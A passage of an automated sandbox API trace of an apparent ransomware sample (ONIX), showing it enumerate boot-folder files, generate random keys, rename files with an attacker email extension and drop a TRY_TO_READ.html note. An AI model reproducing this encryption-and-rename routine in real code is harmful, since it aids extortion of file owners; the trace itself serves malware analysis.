Size=0x30) returned 0x470c28 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce78 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e4b0 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e4b0 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce78 | out: hHeap=0x410000) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.448] FindNextFileW (in: hFindFile=0x48e470, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.448] GetLastError () returned 0x0 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce78 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.449] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce78 | out: hHeap=0x410000) returned 1 [0065.449] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.449] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48ce88 [0065.449] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4666c8 [0065.449] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.449] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.449] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.449] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.449] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48ce88 | out: pbBuffer=0x48ce88) returned 1 [0065.449] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4666c8 | out: pbBuffer=0x4666c8) returned 1 [0065.449] SetFileAttributesW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.449] lstrlenW (lpString="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0065.449] GetProcessHeap () returned 0x410000 [0065.449] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.449] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" [0065.449] lstrcatW (in: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.449] GetProcessHeap () returned 0x410000 [0065.449] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.450] CloseHandle (hObject=0xffffffff) returned 0 [0065.450] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.450] FindNextFileW (in: hFindFile=0x48e470, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.450] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.450] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.450] GetLastError () returned 0x6 [0065.450] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.450] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.450] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.450] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.450] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.450] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.450] FindNextFileW (in: hFindFile=0x48e470, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.450] CloseHandle (hObject=0x3cc) returned 1 [0065.450] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.450] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x60)) [0065.450] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.450] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.450] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.451] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\nb-NO9c354ca09c354b444c.lock") returned 37 [0065.451] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO9c354ca09c354b444c.lock" (normalized: "c:\\boot\\nb-no9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.451] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.451] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.451] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.451] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.451] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cec8 | out: hHeap=0x410000) returned 1 [0065.451] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cef0 | out: hHeap=0x410000) returned 1 [0065.451] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nb-NO\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e4b0 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.452] GetLastError () returned 0x0 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cec8 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e4f0 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e4f0 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cec8 | out: hHeap=0x410000) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.452] FindNextFileW (in: hFindFile=0x48e4b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.452] GetLastError () returned 0x0 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cec8 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e4f0 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e4f0 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cec8 | out: hHeap=0x410000) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.452] FindNextFileW (in: hFindFile=0x48e4b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.452] GetLastError () returned 0x0 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cec8 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.453] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cec8 | out: hHeap=0x410000) returned 1 [0065.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48cf90 [0065.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4666d8 [0065.453] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.453] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.453] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.453] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.453] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48cf90 | out: pbBuffer=0x48cf90) returned 1 [0065.453] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4666d8 | out: pbBuffer=0x4666d8) returned 1 [0065.453] SetFileAttributesW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.453] lstrlenW (lpString="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0065.453] GetProcessHeap () returned 0x410000 [0065.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.453] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" [0065.453] lstrcatW (in: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.453] GetProcessHeap () returned 0x410000 [0065.454] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.454] CloseHandle (hObject=0xffffffff) returned 0 [0065.454] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.454] FindNextFileW (in: hFindFile=0x48e4b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.454] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.454] GetLastError () returned 0x6 [0065.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.454] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.454] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.454] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.454] FindNextFileW (in: hFindFile=0x48e4b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.454] CloseHandle (hObject=0x3cc) returned 1 [0065.454] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.454] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x60)) [0065.454] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.454] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.454] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.455] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\nl-NL9c354ca09c354b444c.lock") returned 37 [0065.455] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL9c354ca09c354b444c.lock" (normalized: "c:\\boot\\nl-nl9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.455] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.455] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.455] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf18 | out: hHeap=0x410000) returned 1 [0065.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf40 | out: hHeap=0x410000) returned 1 [0065.455] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nl-NL\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e4f0 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.456] GetLastError () returned 0x0 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf18 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e530 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e530 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf18 | out: hHeap=0x410000) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.456] FindNextFileW (in: hFindFile=0x48e4f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.456] GetLastError () returned 0x0 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf18 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e530 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e530 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf18 | out: hHeap=0x410000) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.456] FindNextFileW (in: hFindFile=0x48e4f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.456] GetLastError () returned 0x0 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf18 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.457] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf18 | out: hHeap=0x410000) returned 1 [0065.457] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.457] 